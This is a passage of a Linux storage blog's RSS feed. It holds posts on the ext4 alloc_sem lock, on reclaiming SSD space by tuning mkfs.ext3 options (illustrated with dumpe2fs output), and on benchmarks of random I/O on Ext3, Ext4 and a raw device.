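            runs.append([block, block])
    return [tuple(run) for run in runs]


print(coalesce_writes([7, 3, 4, 5, 9, 8]))
```

<p>Six scattered writes collapse into two runs, blocks 3 to 5 and blocks 7 to 9. A database that delays and batches writes in this spirit turns much of its random I/O into sequential I/O, which would favor a filesystem that is strong with large sequential transfers.</p>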
<p>Remember that the above benchmarks were collected with write barriers disabled! If you have to enable them to guarantee data integrity, the absolute results can be quite different (but the relative standing should remain more or less similar).</p>
</div>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1088.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>alloc_sem of Ext4 block group</title>
		<link>http://www.enunix.com/1085.html</link>
		<comments>http://www.enunix.com/1085.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:26:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileSystem]]></category>
		<category><![CDATA[ext4]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1085</guid>
		<description><![CDATA[Yesterday Amir Goldstein sent me an email for a deadlock issue. I was in Chinese New Year vacation, could not have time to check the code (also I know I can not answer his question with ease). Thanks to Ted, &#8230; <a href="http://www.enunix.com/1085.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>Yesterday Amir Goldstein sent me an email about a deadlock issue. I was on Chinese New Year vacation and did not have time to check the code (I also know I could not answer his question with ease). Thankfully, Ted provided a quite clear answer. Since Ted’s answer is also very informative to me, I copied and pasted the conversation from linux-ext4@vger.kernel.org to my blog. The copyright of the text quoted below belongs to its original authors.</p>
<blockquote><p>On Sun, Feb 06, 2011 at 10:43:58AM +0200, Amir Goldstein wrote:<br />
&gt; When looking at alloc_sem, I realized that it is only needed to avoid<br />
&gt; race with adjacent group buddy initialization.<br />
Actually, alloc_sem is used to protect all of the block group specific<br />
data structures; the buddy bitmap counters, adjusting the buddy bitmap<br />
itself, the largest free order in a block group, etc.  So even in the<br />
case where block_size == page_size, alloc_sem is still needed!<br />
- Ted</p></blockquote>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1085.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Three Practical System Workloads of Taobao</title>
		<link>http://www.enunix.com/1083.html</link>
		<comments>http://www.enunix.com/1083.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:25:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1083</guid>
		<description><![CDATA[A few days ago, I gave a talk at an academic seminar at ACT of Beihang University (http://act.buaa.edu.cn/). In the talk, I introduced three typical system workloads that we (a group of system software developers inside Taobao) observed on our most heavily used/deployed &#8230; <a href="http://www.enunix.com/1083.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>A few days ago, I gave a talk at an academic seminar at ACT of Beihang University (http://act.buaa.edu.cn/). In the talk, I introduced three typical system workloads that we (a group of system software developers inside Taobao) observed on our most heavily used and deployed product lines. The introduction was quite brief and did not go into detail. We don’t mind sharing what we did imperfectly, and we are open to cooperating with the open source community and industry to improve <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
<p>If you find anything unclear or misleading, please let me know. Communication makes things better most of the time <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1083.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Don’t waste your SSD blocks</title>
		<link>http://www.enunix.com/1081.html</link>
		<comments>http://www.enunix.com/1081.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:25:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[SSD]]></category>
		<category><![CDATA[disk]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1081</guid>
		<description><![CDATA[Recently, one of my colleagues asked me a question. He had formatted an ~80GB Ext3 file system on an SSD. After mounting the file system, the df output was: Filesystem 1K-blocks Used Available Use% Mounted on /dev/sdb1 77418272 184216 73301344 1 &#8230; <a href="http://www.enunix.com/1081.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>Recently, one of my colleagues asked me a question. He had formatted an ~80GB Ext3 file system on an SSD. After mounting the file system, the df output was:</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup span="1">
<col span="1" width="90" />
<col span="1" width="90" />
<col span="1" width="69" />
<col span="1" width="65" />
<col span="1" width="89" />
<col span="1" width="104" /></colgroup>
<tbody>
<tr>
<td align="right" width="90" height="17">Filesystem</td>
<td align="right" width="90">1K-blocks</td>
<td align="right" width="69">Used</td>
<td align="right" width="65">Available</td>
<td align="right" width="89">Use%</td>
<td align="right" width="104">Mounted on</td>
</tr>
<tr>
<td align="right" height="17">/dev/sdb1</td>
<td align="right">77418272</td>
<td align="right">184216</td>
<td align="right">73301344</td>
<td align="right">1</td>
<td align="right">/mnt</td>
</tr>
</tbody>
</table>
<p>The fdisk output for the same partition was:</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup span="1">
<col span="1" width="90" />
<col span="1" width="90" />
<col span="1" width="69" />
<col span="1" width="65" />
<col span="1" width="89" />
<col span="1" width="104" />
<col span="1" width="81" /></colgroup>
<tbody>
<tr>
<td align="right" width="90" height="17">Device</td>
<td align="right" width="90">Boot</td>
<td align="right" width="69">Start</td>
<td align="right" width="65">End</td>
<td align="right" width="89">Blocks</td>
<td align="right" width="104">Id</td>
<td align="right" width="81">System</td>
</tr>
<tr>
<td align="right" height="17">/dev/sdb1</td>
<td align="right"></td>
<td align="right">7834</td>
<td align="right">17625</td>
<td align="right">78654240</td>
<td align="right">83</td>
<td align="right">Linux</td>
</tr>
</tbody>
</table>
<p>From his observation, before formatting the SSD there were 78654240 1K blocks available on the partition; after formatting, only 77418272 1K blocks could be used, which means about 1.2GB of the partition was lost.</p>
<p>A more serious question: in the df output, used blocks + available blocks = 73485560, but the file system had 77418272 blocks, so 3932712 1K blocks (about 3.75GB) had disappeared! This 160GB SSD cost him 430 USD, and he complained that around 15 USD had been paid for nothing.</p>
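<p>The arithmetic behind these two gaps can be checked with a short script. This is only a sketch: the constant names are mine, and the figures are copied from the df and fdisk tables above.</p>

```python
# Figures copied from the df and fdisk output above (all in 1K blocks).
FDISK_BLOCKS = 78654240   # partition size reported by fdisk
DF_TOTAL = 77418272       # "1K-blocks" column of df
DF_USED = 184216          # "Used" column of df
DF_AVAILABLE = 73301344   # "Available" column of df


def kib_to_gib(kib):
    """Convert a count of 1K blocks to GiB."""
    return kib / (1024 * 1024)


# Space that never shows up in the file system total.
lost_to_format = FDISK_BLOCKS - DF_TOTAL
# Space inside the file system that is neither "Used" nor "Available".
hidden_from_df = DF_TOTAL - (DF_USED + DF_AVAILABLE)

print("lost when formatting:", lost_to_format, "1K blocks,",
      round(kib_to_gib(lost_to_format), 2), "GiB")
print("hidden from df:", hidden_from_df, "1K blocks,",
      round(kib_to_gib(hidden_from_df), 2), "GiB")
```

<p>The second gap is the one explained by the root reserve discussed further down.</p>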
<p>IMHO, this is quite an interesting question, and one that many people have asked many times. This time, I’d like to explain how the blocks are wasted and how to make better use of every block on the SSD (since it’s quite expensive).</p>
<p>First of all, better storage usage depends on the actual I/O pattern. This SSD is used to store large files for random I/O. Almost all of the I/O (99%+) is reading at random file offsets, so writes can almost be ignored. Therefore, the goal is to use every available block to store a few very big files on the Ext3 file system.</p>
<p>If you format an Ext3 file system with only the default command line, like “mkfs.ext3 /dev/sdb1”, mkfs.ext3 does the following for block allocation:</p>
<p>- Allocates reserved blocks for the root user, so that unprivileged users cannot use up all the disk space.</p>
<p>- Allocates metadata such as the superblock, backup superblocks, block group descriptors, and the block bitmap, inode bitmap and inode table for each block group.</p>
<p>- Allocates reserved block group descriptor blocks for future file system extension.</p>
<p>- Allocates blocks for the journal.</p>
<p>Since the SSD is only used for data storage, has no operating system installed on it, does not need good write performance, will never be resized, and holds only a few files, the following block allocations are unnecessary:</p>
<p>- Journal blocks</p>
<p>- Inode table blocks</p>
<p>- Reserved group descriptor blocks for file system resize</p>
<p>- Reserved blocks for root user</p>
<p>Let’s run dumpe2fs to see how many blocks are wasted on the above items. I only list the relevant part of the output here:</p>
<blockquote><p>&gt; dumpe2fs /dev/sdb1</p></blockquote>
<blockquote><p>Filesystem volume name:   &lt;none&gt;<br />
Last mounted on:          &lt;not available&gt;<br />
Filesystem UUID:          f335ba18-70cc-43f9-bdc8-ed0a8a1a5ad3<br />
Filesystem magic number:  0xEF53<br />
Filesystem revision #:    1 (dynamic)<br />
Filesystem features:      has_journal ext_attr <strong>resize_inode</strong> dir_index filetype needs_recovery sparse_super large_file<br />
Filesystem flags:         signed_directory_hash<br />
Default mount options:    (none)<br />
Filesystem state:         clean<br />
Errors behavior:          Continue<br />
Filesystem OS type:       Linux<br />
Inode count:              4923392<br />
Block count:              19663560<br />
<strong>Reserved block count:     983178</strong><br />
Free blocks:              19308514<br />
Free inodes:              4923381<br />
First block:              0<br />
Block size:               4096<br />
Fragment size:            4096<br />
<strong>Reserved GDT blocks:      1019</strong><br />
Blocks per group:         32768<br />
Fragments per group:      32768<br />
<strong>Inodes per group:         8192<br />
Inode blocks per group:   512</strong><br />
Filesystem created:       Tue Jul  6 21:42:32 2010<br />
Last mount time:          Tue Jul  6 21:44:42 2010<br />
Last write time:          Tue Jul  6 21:44:42 2010<br />
Mount count:              1<br />
Maximum mount count:      39<br />
Last checked:             Tue Jul  6 21:42:32 2010<br />
Check interval:           15552000 (6 months)<br />
Next check after:         Sun Jan  2 21:42:32 2011<br />
Reserved blocks uid:      0 (user root)<br />
Reserved blocks gid:      0 (group root)<br />
First inode:              11<br />
<strong>Inode size:               256</strong><br />
Required extra isize:     28<br />
Desired extra isize:      28<br />
Journal inode:            8<br />
Default directory hash:   half_md4<br />
Directory Hash Seed:      3ef6ca72-c800-4c44-8c77-532a21bcad5a<br />
Journal backup:           inode blocks<br />
Journal features:         (none)<br />
<strong>Journal size:             128M<br />
</strong>Journal length:           32768<br />
Journal sequence:         0x00000001<br />
Journal start:            0</p></blockquote>
<blockquote><p>Group 0: (Blocks 0-32767)<br />
Primary superblock at 0, Group descriptors at 1-5<br />
<strong>Reserved GDT blocks at 6-1024</strong><br />
Block bitmap at 1025 (+1025), Inode bitmap at 1026 (+1026)<br />
<strong>Inode table at 1027-1538 (+1027)</strong><br />
31223 free blocks, 8181 free inodes, 2 directories<br />
Free blocks: 1545-32767<br />
Free inodes: 12-8192</p>
<p>[snip ....]</p></blockquote>
<p>The file system block size is 4KB, which differs from the 1KB block size used in the df and fdisk output. In the output above, I marked the key lines in <strong>bold</strong>. Now let’s look at the line for reserved blocks:</p>
<blockquote><p><strong>Reserved block count:     983178</strong></p></blockquote>
<p>These 983178 4KB blocks are reserved for the root user. Since neither the system nor the users’ home directories are on the SSD, we don’t need to reserve these blocks. According to mkfs.ext3(8), the ‘-m’ parameter sets the reserved-blocks-percentage; use ‘-m 0’ to reserve no blocks for the privileged user.</p>
<p>From the file system features line, we can see that resize_inode is one of the features enabled by default:</p>
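<p>As a quick check, the reserve can be converted into the 1K units that df uses and compared with the df table earlier in this post. The sketch below only uses numbers already shown above; the variable names are mine.</p>

```python
# Values copied from the dumpe2fs output above.
RESERVED_BLOCKS = 983178    # "Reserved block count"
BLOCK_COUNT = 19663560      # "Block count"
BLOCK_SIZE_KIB = 4          # "Block size: 4096"

# Values copied from the df output earlier in the post (1K blocks).
DF_TOTAL = 77418272
DF_USED = 184216
DF_AVAILABLE = 73301344

reserved_percent = 100 * RESERVED_BLOCKS / BLOCK_COUNT
reserved_1k_blocks = RESERVED_BLOCKS * BLOCK_SIZE_KIB
df_gap = DF_TOTAL - DF_USED - DF_AVAILABLE

print("reserved for root:", reserved_percent, "percent of all blocks")
print("reserved for root:", reserved_1k_blocks, "1K blocks")
print("blocks missing from df:", df_gap, "1K blocks")
```

<p>The reserve works out to 5% of the file system, and it equals the number of 1K blocks that df counts as neither used nor available.</p>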
<blockquote><p>Filesystem features:      has_journal ext_attr <strong>resize_inode</strong> dir_index filetype needs_recovery sparse_super large_file</p></blockquote>
<p>The resize_inode feature reserves quite a lot of blocks for future block group descriptors. These blocks can be found in lines like:</p>
<blockquote><p><strong>Reserved GDT blocks at 6-1024</strong></p></blockquote>
<p>When the resize_inode feature is enabled, mkfs.ext3 reserves some blocks after the block group descriptor blocks, called “Reserved GDT blocks”. If the file system is extended in the future (e.g. when it is created on a logical volume), these reserved blocks can be used for new block group descriptors. Here the storage medium is an SSD partition that will not be extended, so we don’t have to pay money (on SSD, blocks mean money) for this kind of block. To disable the resize_inode feature, use “-O ^resize_inode” in mkfs.ext3(8).</p>
<p>Next, look at these two lines about inode blocks:</p>
<blockquote><p><strong>Inodes per group:         8192<br />
Inode blocks per group:   512</strong></p></blockquote>
<p>We store no more than 5 files on the whole file system, but 512 blocks in each block group are allocated for the inode table. There are 601 block groups, which means 512×601=307712 blocks (≈ 1.2GB of space) are wasted on inode tables. Use ‘-N 16’ in mkfs.ext3(8) to request only 16 inodes in the file system. mkfs.ext3(8) still allocates at least one inode table block in each block group (so more than 16 inodes in total), but now we waste only 1 block per group instead of 512 on the inode table.</p>
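<p>The inode table numbers follow directly from the dumpe2fs fields. The sketch below redoes the calculation; it assumes, as described above, that one inode table block per group remains after formatting with a tiny inode count.</p>

```python
# Values copied from the dumpe2fs output above.
BLOCK_SIZE = 4096
BLOCK_COUNT = 19663560
BLOCKS_PER_GROUP = 32768
INODES_PER_GROUP = 8192
INODE_SIZE = 256

# Number of block groups, rounding the last partial group up.
groups = (BLOCK_COUNT + BLOCKS_PER_GROUP - 1) // BLOCKS_PER_GROUP

# Each 4KB block holds 16 inodes of 256 bytes, so 8192 inodes need 512 blocks.
inodes_per_block = BLOCK_SIZE // INODE_SIZE
inode_blocks_per_group = INODES_PER_GROUP // inodes_per_block

default_table_blocks = groups * inode_blocks_per_group
minimal_table_blocks = groups * 1          # assumption: one block per group
saved_blocks = default_table_blocks - minimal_table_blocks

print("block groups:", groups)
print("inode table blocks by default:", default_table_blocks)
print("inode table blocks saved:", saved_blocks)
print("saved space in GiB:", round(saved_blocks * BLOCK_SIZE / 1024**3, 2))
```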
<blockquote><p><strong>Journal size:             128M<br />
</strong></p></blockquote>
<p>If most of the I/O is reading, write performance can be ignored, and you really care about space usage, the journal can be reduced to its minimum size (1024 file system blocks). For Ext3 with 4KB blocks that is 4MB: -J size=4 (the size is given in megabytes)</p>
<p>With the above changes, more than 4GB of space comes back into use. If you really care about the space efficiency of your SSD, how about making the file system with:</p>
<blockquote><p>mkfs.ext3 -J size=4 -m 0 -O ^resize_inode -N 16  &lt;device&gt;</p></blockquote>
<p>Then you have a chance to put more data blocks to use on your expensive SSD <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
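<p>To get a feeling for the total, the four items can be added up from the dumpe2fs numbers. This is a rough estimate, not a measurement. It assumes that reserved GDT blocks exist only in groups that carry a superblock copy, and that with sparse_super those are groups 0, 1 and powers of 3, 5 and 7. The helper name is mine.</p>

```python
# Values copied from the dumpe2fs output above; sizes are in 4KB blocks.
BLOCK_SIZE = 4096
BLOCK_COUNT = 19663560
BLOCKS_PER_GROUP = 32768
RESERVED_ROOT_BLOCKS = 983178
RESERVED_GDT_BLOCKS = 1019      # per group that holds a superblock copy
INODE_BLOCKS_PER_GROUP = 512
JOURNAL_BLOCKS = 32768          # "Journal length"
MIN_JOURNAL_BLOCKS = 1024       # minimum journal size mentioned in the text


def has_superblock_copy(group):
    """Assumed sparse_super layout: groups 0, 1 and powers of 3, 5 and 7."""
    if group in (0, 1):
        return True
    for base in (3, 5, 7):
        power = base
        while group > power:
            power *= base
        if power == group:
            return True
    return False


groups = (BLOCK_COUNT + BLOCKS_PER_GROUP - 1) // BLOCKS_PER_GROUP
copies = sum(1 for g in range(groups) if has_superblock_copy(g))

savings = {
    "root reserve": RESERVED_ROOT_BLOCKS,
    "reserved GDT blocks": copies * RESERVED_GDT_BLOCKS,
    "inode tables": groups * (INODE_BLOCKS_PER_GROUP - 1),
    "journal": JOURNAL_BLOCKS - MIN_JOURNAL_BLOCKS,
}
total_blocks = sum(savings.values())

for name, blocks in savings.items():
    print(f"{name}: {blocks} blocks")
print(f"total: {total_blocks} blocks, "
      f"{total_blocks * BLOCK_SIZE / 1024**3:.2f} GiB")
```

<p>Under these assumptions the root reserve and the inode tables dominate; the journal and the reserved GDT blocks are comparatively small.</p>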
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1081.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Random I/O: is a raw device always faster than a file system?</title>
		<link>http://www.enunix.com/1079.html</link>
		<comments>http://www.enunix.com/1079.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:24:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[device]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[io]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1079</guid>
		<description><![CDATA[For some implementations of distributed file systems, like TFS [1], developers think that storing data directly on a raw device (e.g. /dev/sdb, /dev/sdc…) might be faster than on a file system. Their choice is reasonable: 1, Random I/O on a large file cannot get &#8230; <a href="http://www.enunix.com/1079.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>For some implementations of distributed file systems, like TFS [1], developers think that storing data directly on a raw device (e.g. /dev/sdb, /dev/sdc…) might be faster than on a file system.</p>
<p>Their choice is reasonable:</p>
<blockquote><p>1, Random I/O on a large file gets little help from the file system page cache.</p>
<p>2, The &lt;logical offset, physical offset&gt; mapping introduces more I/O on a file system than on a raw disk.</p>
<p>3, Managing metadata on other, more powerful servers avoids the need for a file system on the data nodes.</p></blockquote>
<p>The penalty for the “higher” performance is management cost. Storing data on a raw device introduces difficulties like:</p>
<blockquote><p>1, It is harder to back up and restore the data.</p>
<p>2, Flexible management is impossible without special management tools for the raw device.</p>
<p>3, There is no convenient way to access and manage the data on the raw device.</p></blockquote>
<p>System administrators can hardly ignore these penalties. Furthermore, the story of “higher” performance is not exactly true today:</p>
<blockquote><p>1, For file systems that use block pointers for the &lt;logical offset, physical offset&gt; mapping, a large file takes too many pointer blocks. For example, on Ext3 with 4KB blocks, a 2TB file needs around 520K pointer blocks. Most of the pointer blocks are cold under random I/O, which results in lower random I/O performance than on a raw device.</p>
<p>2, For file systems that use extents for the &lt;logical offset, physical offset&gt; mapping, the number of extent blocks depends on how many fragments a large file has. For example, on Ext4 with a maximum block group size of 128MB, a 2TB file has around 16384 fragments. Mapping these 16K fragments needs 16K extent records, which fit in about 50 extent blocks. It is very easy to hit a hot extent in memory for random I/O on a large file.</p>
<p>3, If the &lt;logical offset, physical offset&gt; mapping can be kept hot in memory, random I/O performance on a file system might not be worse than on a raw device.</p></blockquote>
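<p>The two block counts above can be estimated with a few lines of arithmetic. This is a rough sketch under stated assumptions: 4-byte block pointers on Ext3 (ignoring the 12 direct pointers in the inode), and on Ext4 a 12-byte header plus 12-byte entries per extent block, with every extent covering a full 128MB. The function name is mine.</p>

```python
def ceil_div(a, b):
    """Integer division rounded up."""
    return -(-a // b)


BLOCK_SIZE = 4096
FILE_SIZE = 2 * 1024**4                  # 2TB file
data_blocks = FILE_SIZE // BLOCK_SIZE

# Ext3: every level of the pointer tree needs one pointer per block below it.
POINTERS_PER_BLOCK = BLOCK_SIZE // 4     # assumption: 4-byte block pointers
ext3_pointer_blocks = 0
level = data_blocks
while level > 1:
    level = ceil_div(level, POINTERS_PER_BLOCK)
    ext3_pointer_blocks += level

# Ext4: one extent per 128MB fragment, packed into extent blocks.
MAX_EXTENT_BYTES = 128 * 1024**2
ENTRY_SIZE = 12                          # assumption: 12-byte header and entries
extents = ceil_div(FILE_SIZE, MAX_EXTENT_BYTES)
extents_per_block = (BLOCK_SIZE - ENTRY_SIZE) // ENTRY_SIZE
ext4_leaf_blocks = ceil_div(extents, extents_per_block)
ext4_index_blocks = ceil_div(ext4_leaf_blocks, extents_per_block)
ext4_extent_blocks = ext4_leaf_blocks + ext4_index_blocks

print("Ext3 pointer blocks:", ext3_pointer_blocks)
print("Ext4 extents:", extents)
print("Ext4 extent blocks:", ext4_extent_blocks)
```

<p>The gap of roughly four orders of magnitude between the two results is why the extent mapping can stay hot in memory while the pointer blocks cannot.</p>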
<p>To verify my guess, I did some performance testing. I share part of the data here.</p>
<blockquote><p>Processor: AMD Opteron 6174 (2.2 GHz) x 2</p>
<p>Memory: DDR3 1333MHz 4GB x 4</p>
<p>Hard disk: 5400RPM SATA 2TB x 3 [2]</p>
<p>File size: almost 2TB (created by dd)</p>
<p>Random I/O access: 100K reads</p>
<p>IO size: 512 bytes</p>
<p>File systems: Ext3, Ext4 (with and without direct I/O)</p>
<p>Test tool: <a href="http://www.mlxos.org/misc/seekrw.c" target="_blank">seekrw</a> [3]</p></blockquote>
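<p>For readers who want to try a similar access pattern without the C tool, here is a minimal sketch of a random-read loop. It is not seekrw and does not reproduce its options; the function name and parameters are hypothetical. It works on regular files, goes through the page cache (no direct I/O), and needs a Unix-like system for os.pread.</p>

```python
import os
import random
import time


def random_reads(path, count, io_size=512, seed=0):
    """Read io_size bytes at `count` random aligned offsets.

    Returns (total_bytes_read, elapsed_seconds).
    """
    rng = random.Random(seed)
    fd = os.open(path, os.O_RDONLY)
    try:
        # st_size is only meaningful for regular files, not block devices.
        slots = os.fstat(fd).st_size // io_size
        if slots == 0:
            raise ValueError("file is smaller than one I/O unit")
        total = 0
        start = time.perf_counter()
        for _ in range(count):
            offset = rng.randrange(slots) * io_size
            total += len(os.pread(fd, io_size, offset))
        return total, time.perf_counter() - start
    finally:
        os.close(fd)


# Example call (the path is the test image used in this post):
# total, elapsed = random_reads("/mnt/ext4/img", 100000)
```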
<p>* With page cache (buffered I/O)</p>
<blockquote><p>- Command</p>
<p>seekrw -f /mnt/ext3/img -a 100000 -l 512 -r</p>
<p>seekrw -f /mnt/ext4/img -a 100000 -l 512 -r</p>
<p>- Performance result</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup>
<col width="64" />
<col width="75" />
<col width="72" />
<col width="86" />
<col width="86" />
<col width="86" />
<col width="86" /></colgroup>
<tbody>
<tr>
<td align="left" width="64" height="17"></td>
<td align="right" width="75">Device</td>
<td align="right" width="72">tps</td>
<td align="right" width="86">Blk_read/s</td>
<td align="right" width="86">Blk_wrtn/s</td>
<td align="right" width="86">Blk_read</td>
<td align="right" width="86">Blk_wrtn</td>
</tr>
<tr>
<td align="left" height="17">Ext3</td>
<td align="right">sdc</td>
<td align="right">95.88</td>
<td align="right">767.07</td>
<td align="right">0</td>
<td align="right">46024</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Ext4</td>
<td align="right">sdd</td>
<td align="right">60.72</td>
<td align="right">485.6</td>
<td align="right">0</td>
<td align="right">29136</td>
<td align="right">0</td>
</tr>
</tbody>
</table>
<p>- Wall clock time</p>
<p>Ext3: real time: 34 minutes 23 seconds 557537 usec</p>
<p>Ext4: real time: 24 minutes 44 seconds 10118 usec</p></blockquote>
<p>* Direct I/O (without page cache)</p>
<blockquote><p>- Command</p>
<p>seekrw -f /mnt/ext3/img -a 100000 -l 512 -r -d</p>
<p>seekrw -f /mnt/ext4/img -a 100000 -l 512 -r -d</p>
<p>- Performance result</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup>
<col width="64" />
<col width="75" />
<col width="72" />
<col width="86" />
<col width="86" />
<col width="86" />
<col width="86" /></colgroup>
<tbody>
<tr>
<td align="left" width="64" height="17"></td>
<td align="right" width="75">Device</td>
<td align="right" width="72">tps</td>
<td align="right" width="86">Blk_read/s</td>
<td align="right" width="86">Blk_wrtn/s</td>
<td align="right" width="86">Blk_read</td>
<td align="right" width="86">Blk_wrtn</td>
</tr>
<tr>
<td align="left" height="17">Ext3</td>
<td align="right">sdc</td>
<td align="right">94.93</td>
<td align="right">415.77</td>
<td align="right">0</td>
<td align="right">12473</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Ext4</td>
<td align="right">sdd</td>
<td align="right">67.9</td>
<td align="right">67.9</td>
<td align="right">0</td>
<td align="right">2037</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Raw</td>
<td align="right">sdf</td>
<td align="right">67.27</td>
<td align="right">538.13</td>
<td align="right">0</td>
<td align="right">16144</td>
<td align="right">0</td>
</tr>
</tbody>
</table>
<p>- Wall clock time</p>
<p>Ext3: real time: 33 minutes 26 seconds 947875 usec</p>
<p>Ext4: real time: 24 minutes 25 seconds 545536 usec</p>
<p>sdf: real time: 24 minutes 38 seconds 523379 usec    (raw device)</p></blockquote>
<p>From the above numbers, Ext4 is about 39% faster than Ext3 on random I/O with the page cache and about 37% faster with direct I/O, which is expected.</p>
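<p>The relative speed can be recomputed from the wall clock times listed above. The sketch below only converts those times to seconds and compares them; the helper name is mine.</p>

```python
def seconds(minutes, secs, usec):
    """Convert a 'minutes seconds usec' wall clock reading to seconds."""
    return minutes * 60 + secs + usec / 1_000_000


# Wall clock times copied from the results above.
ext3_cached = seconds(34, 23, 557537)
ext4_cached = seconds(24, 44, 10118)
ext3_direct = seconds(33, 26, 947875)
ext4_direct = seconds(24, 25, 545536)
raw_direct = seconds(24, 38, 523379)

# "X percent faster" here means the slower run took X percent more time.
cached_gain = (ext3_cached / ext4_cached - 1) * 100
direct_gain = (ext3_direct / ext4_direct - 1) * 100
raw_vs_ext4 = (raw_direct / ext4_direct - 1) * 100

print(f"Ext4 vs Ext3, page cache: {cached_gain:.1f}% faster")
print(f"Ext4 vs Ext3, direct I/O: {direct_gain:.1f}% faster")
print(f"Raw device vs Ext4, direct I/O: {raw_vs_ext4:.1f}% more time")
```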
<p>The results of random I/O on Ext4 and on the raw device are almost the same. This is also expected. For file systems that map &lt;logical offset, physical offset&gt; by extent, it’s quite easy to keep most of the mapping records hot in memory. Random I/O on a raw device has *NO* obvious performance advantage over Ext4.</p>
<p>Dear developers, how about considering extent-based file systems now? <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
<p>—</p>
<p>[1] TFS (TaobaoFS) is a distributed file system deployed for http://www.taobao.com . It is developed by the core system team of Taobao and will be open sourced very soon.</p>
<p>[2] The hard disks are connected to the system through a RocketRAID 644 card via eSATA connectors.</p>
<p>[3] The seekrw source code can be downloaded from http://www.mlxos.org/misc/seekrw.c</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1079.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

